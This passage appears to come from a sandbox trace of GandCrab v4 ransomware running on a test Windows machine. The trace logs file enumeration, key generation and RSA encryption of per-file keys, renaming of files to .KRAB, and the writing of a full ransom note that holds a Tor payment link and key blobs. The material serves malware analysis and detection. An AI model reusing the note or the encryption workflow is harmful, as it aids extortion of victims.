lpString2="autorun.inf") returned 1 [0093.453] lstrcmpiW (lpString1="KUqlS9GQ4u 1q.mp3", lpString2="ntuser.dat") returned -1 [0093.453] lstrcmpiW (lpString1="KUqlS9GQ4u 1q.mp3", lpString2="iconcache.db") returned 1 [0093.454] lstrcmpiW (lpString1="KUqlS9GQ4u 1q.mp3", lpString2="bootsect.bak") returned 1 [0093.454] lstrcmpiW (lpString1="KUqlS9GQ4u 1q.mp3", lpString2="boot.ini") returned 1 [0093.454] lstrcmpiW (lpString1="KUqlS9GQ4u 1q.mp3", lpString2="ntuser.dat.log") returned -1 [0093.454] lstrcmpiW (lpString1="KUqlS9GQ4u 1q.mp3", lpString2="thumbs.db") returned -1 [0093.454] lstrcmpiW (lpString1="KUqlS9GQ4u 1q.mp3", lpString2="KRAB-DECRYPT.html") returned 1 [0093.454] lstrcmpiW (lpString1="KUqlS9GQ4u 1q.mp3", lpString2="KRAB-DECRYPT.txt") returned 1 [0093.454] lstrcmpiW (lpString1="KUqlS9GQ4u 1q.mp3", lpString2="CRAB-DECRYPT.txt") returned 1 [0093.454] lstrcmpiW (lpString1="KUqlS9GQ4u 1q.mp3", lpString2="ntldr") returned -1 [0093.454] lstrcmpiW (lpString1="KUqlS9GQ4u 1q.mp3", lpString2="NTDETECT.COM") returned -1 [0093.454] lstrcmpiW (lpString1="KUqlS9GQ4u 1q.mp3", lpString2="Bootfont.bin") returned 1 [0093.454] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0093.454] CryptAcquireContextW (in: phProv=0x338ec34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec34*=0x1011678) returned 1 [0093.455] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0093.455] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0093.455] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0093.456] CryptGenRandom (in: hProv=0x1011678, dwLen=0x20, pbBuffer=0x338eccc | out: pbBuffer=0x338eccc) returned 1 [0093.456] CryptReleaseContext (hProv=0x1011678, dwFlags=0x0) returned 1 [0093.456] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.456] CryptAcquireContextW (in: phProv=0x338ec34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec34*=0x1010df8) returned 1 [0093.456] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0093.457] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0093.457] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0093.457] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x8, pbBuffer=0x338ecec | out: pbBuffer=0x338ecec) returned 1 [0093.457] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0093.457] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.458] CryptAcquireContextW (in: phProv=0x338ec2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec2c*=0x10113d0) returned 1 [0093.458] CryptImportKey (in: hProv=0x10113d0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338ec30 | out: phKey=0x338ec30*=0xfbd620) returned 1 [0093.458] CryptGetKeyParam (in: hKey=0xfbd620, dwParam=0x8, pbData=0x338ec24, pdwDataLen=0x338ec28, dwFlags=0x0 | out: pbData=0x338ec24*=0x800, pdwDataLen=0x338ec28*=0x4) returned 1 [0093.458] CryptEncrypt (in: hKey=0xfbd620, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338ec5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338ec5c*=0x100) returned 1 [0093.459] GetLastError () returned 0x0 [0093.459] CryptDestroyKey (hKey=0xfbd620) returned 1 [0093.459] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0093.459] CryptAcquireContextW (in: phProv=0x338ec2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec2c*=0x1010df8) returned 1 [0093.466] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338ec30 | out: phKey=0x338ec30*=0xfbd620) returned 1 [0093.466] CryptGetKeyParam (in: hKey=0xfbd620, dwParam=0x8, pbData=0x338ec24, pdwDataLen=0x338ec28, dwFlags=0x0 | out: pbData=0x338ec24*=0x800, pdwDataLen=0x338ec28*=0x4) returned 1 [0093.466] CryptEncrypt (in: hKey=0xfbd620, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338ec5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338ec5c*=0x100) returned 1 [0093.470] GetLastError () returned 0x0 [0093.470] CryptDestroyKey (hKey=0xfbd620) returned 1 [0093.470] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0093.470] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\CEC_ty9-ROAAa-lKe\\KUqlS9GQ4u 1q.mp3" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\cec_ty9-roaaa-lke\\kuqls9gq4u 1q.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x734 [0093.471] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0093.471] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0093.472] ReadFile (in: hFile=0x734, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ecfc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ecfc*=0x1879a, lpOverlapped=0x0) returned 1 [0093.512] SetFilePointerEx (in: hFile=0x734, liDistanceToMove=0xfffe7866, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.512] WriteFile (in: hFile=0x734, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x1879a, lpNumberOfBytesWritten=0x338ecf8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ecf8*=0x1879a, lpOverlapped=0x0) returned 1 [0093.514] WriteFile (in: hFile=0x734, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ecf8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ecf8*=0x208, lpOverlapped=0x0) returned 1 [0093.515] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.535] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.539] CloseHandle (hObject=0x734) returned 1 [0093.539] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.542] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\CEC_ty9-ROAAa-lKe\\KUqlS9GQ4u 1q.mp3" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\cec_ty9-roaaa-lke\\kuqls9gq4u 1q.mp3"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\CEC_ty9-ROAAa-lKe\\KUqlS9GQ4u 1q.mp3.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\cec_ty9-roaaa-lke\\kuqls9gq4u 1q.mp3.krab")) returned 1 [0093.544] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.544] FindNextFileW (in: hFindFile=0xfbd560, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 0 [0093.544] FindClose (in: hFindFile=0xfbd560 | out: hFindFile=0xfbd560) returned 1 [0093.544] CloseHandle (hObject=0x3a8) returned 1 [0093.544] FindNextFileW (in: hFindFile=0xfbd3e0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0093.544] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0093.544] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0093.544] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\d2ca4a08d2ca4dee3d.lock" [0093.545] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0093.545] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 65 [0093.545] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\d2ca4a08d2ca4dee3d.lock") returned 60 [0093.545] lstrlenW (lpString=".lock") returned 5 [0093.545] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0093.545] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0093.545] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.546] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.546] FindNextFileW (in: hFindFile=0xfbd3e0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0093.546] lstrcmpW (lpString1="GtMXn YY", lpString2=".") returned 1 [0093.546] lstrcmpW (lpString1="GtMXn YY", lpString2="..") returned 1 [0093.546] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\", lpString2="GtMXn YY" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY" [0093.546] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\" [0093.546] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0093.546] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0093.546] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0093.546] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0093.546] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0093.546] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.547] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0093.547] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\\\KRAB-DECRYPT.txt") returned 63 [0093.547] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\gtmxn yy\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0093.548] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0093.548] WriteFile (in: hFile=0x3a8, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338ed20, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338ed20*=0x1f6e, lpOverlapped=0x0) returned 1 [0093.549] CloseHandle (hObject=0x3a8) returned 1 [0093.549] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.549] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0093.549] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x28, wMilliseconds=0x2e9)) [0093.549] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0093.550] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0093.550] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0093.550] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\d2ca4a08d2ca4dee3d.lock") returned 69 [0093.550] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\gtmxn yy\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3a8 [0093.551] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.551] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.551] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\") returned 46 [0093.551] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\*" [0093.551] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\*", lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 0xfbd7a0 [0093.551] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.551] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0093.551] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.552] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.552] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0093.552] lstrcmpW (lpString1="1i AJshc.wav", lpString2=".") returned 1 [0093.552] lstrcmpW (lpString1="1i AJshc.wav", lpString2="..") returned 1 [0093.552] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\", lpString2="1i AJshc.wav" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\1i AJshc.wav") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\1i AJshc.wav" [0093.552] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0093.552] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\1i AJshc.wav.KRAB") returned 63 [0093.552] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\1i AJshc.wav") returned 58 [0093.552] lstrlenW (lpString=".wav") returned 4 [0093.552] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0093.552] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".wav ") returned 5 [0093.552] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.553] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\1i AJshc.wav") returned 58 [0093.553] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\GtMXn YY\\1i AJshc.wav") returned 58 [0093.553] lstrcmpiW (lpString1="1i AJshc.wav", lpString2="desktop.ini") returned -1 [0093.553] lstrcmpiW (lpString1="1i AJshc.wav", lpString2="autorun.inf") returned -1 [0093.553] lstrcmpiW (lpString1="1i AJshc.wav", lpString2="ntuser.dat") returned -1 [0093.553] lstrcmpiW (lpString1="1i AJshc.wav", lpString2="iconcache.db") returned -1 [0093.553] lstrcmpiW (lpString1="1i AJshc.wav", lpString2="bootsect.bak") returned -1 [0093.553] lstrcmpiW (lpString1="1i AJshc.wav", lpString2="boot.ini") returned -1 [0093.553] lstrcmpiW (lpString1="1i AJshc.wav", lpString2="ntuser.dat.log") returned -1 [0093.553] lstrcmpiW (lpString1="1i AJshc.wav", lpString2="thumbs.db") returned -1 [0093.553] lstrcmpiW (lpString1="1i AJshc.wav", lpString2="KRAB-DECRYPT.html") returned -1 [0093.553] lstrcmpiW (lpString1="1i AJshc.wav", lpString2="KRAB-DECRYPT.txt") returned -1 [0093.553] lstrcmpiW (lpString1="1i AJshc.wav", lpString2="CRAB-DECRYPT.txt") returned -1 [0093.553] lstrcmpiW (lpString1="1i AJshc.wav", lpString2="ntldr") returned -1 [0093.553] lstrcmpiW (lpString1="1i AJshc.wav", lpString2="NTDETECT.COM") returned -1 [0093.553] lstrcmpiW (lpString1="1i AJshc.wav", lpString2="Bootfont.bin") returned -1 [0093.553] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0093.593] CryptAcquireContextW (in: phProv=0x338ec34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec34*=0x10114e0) returned 1 [0093.593] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0093.594] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0093.594] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0093.594] CryptGenRandom (in: hProv=0x10114e0, dwLen=0x20, pbBuffer=0x338eccc | out: pbBuffer=0x338eccc) returned 1 [0093.594] CryptReleaseContext (hProv=0x10114e0, dwFlags=0x0) returned 1 [0093.594] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.594] CryptAcquireContextW (in: phProv=0x338ec34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec34*=0x1011458) returned 1 [0093.595] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0093.595] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0093.596] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0093.596] CryptGenRandom (in: hProv=0x1011458, dwLen=0x8, pbBuffer=0x338ecec | out: pbBuffer=0x338ecec) returned 1 [0093.596] CryptReleaseContext (hProv=0x1011458, dwFlags=0x0) returned 1 [0093.596] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.596] CryptAcquireContextW (in: phProv=0x338ec2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec2c*=0x1011018) returned 1 [0093.596] CryptImportKey (in: hProv=0x1011018, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338ec30 | out: phKey=0x338ec30*=0xfbd920) returned 1 [0093.596] CryptGetKeyParam (in: hKey=0xfbd920, dwParam=0x8, pbData=0x338ec24, pdwDataLen=0x338ec28, dwFlags=0x0 | out: pbData=0x338ec24*=0x800, pdwDataLen=0x338ec28*=0x4) returned 1 [0093.596] CryptEncrypt (in: hKey=0xfbd920, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338ec5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338ec5c*=0x100) returned 1 [0093.597] GetLastError () returned 0x0 [0093.597] CryptDestroyKey (hKey=0xfbd920) returned 1 [0093.597] CryptReleaseContext (hProv=0x1011018, dwFlags=0x0) returned 1 [0093.597] CryptAcquireContextW (in: phProv=0x338ec2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, 